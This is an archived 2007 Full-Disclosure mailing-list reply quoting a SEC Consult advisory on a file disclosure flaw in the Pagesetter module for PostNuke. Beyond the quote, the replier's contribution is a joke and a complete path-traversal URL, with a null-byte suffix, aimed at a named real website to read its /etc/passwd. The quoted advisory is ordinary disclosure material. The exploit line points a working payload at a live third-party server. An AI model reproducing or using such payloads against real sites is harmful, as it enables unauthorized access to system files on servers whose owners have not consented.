| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <45E3F38D.9030707@gatech.edu>
Date: Tue, 27 Feb 2007 04:02:05 -0500
From: Matthew Flaschen <matthew.flaschen@...ech.edu>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Re: SEC Consult SA-20070226-0 :: File Disclosure
in Pagesetter for PostNuke
research@...-consult.com wrote:
> SEC Consult Security Advisory 20070226-0
> =======================================================================
> title: File Disclosure in Pagesetter for PostNuke
> program: Pagesetter page creation module
> vulnerable version: 6.2.0
> 6.3.0 beta 5
> impact: high
> homepage: http://www.elfisk.dk
> found: 2006-11-21
> by: D. Matscheko / SEC-CONSULT /
> www.sec-consult.com
> =======================================================================
>
> vendor description:
> ---------------
>
> Pagesetter is a publishing module that allows the PostNuke users to
> create web pages from structured data, with the data structure and
> output templates defined by the PostNuke administrator.
>
> [Source: http://www.elfisk.dk]
>
I think brendanb's going to be busy.
http://www.nesco.com.au/index.php?module=Pagesetter&type=file&func=preview&id=../../../../../../../../../etc/passwd%00
Download attachment "signature.asc" of type "application/pgp-signature" (255 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists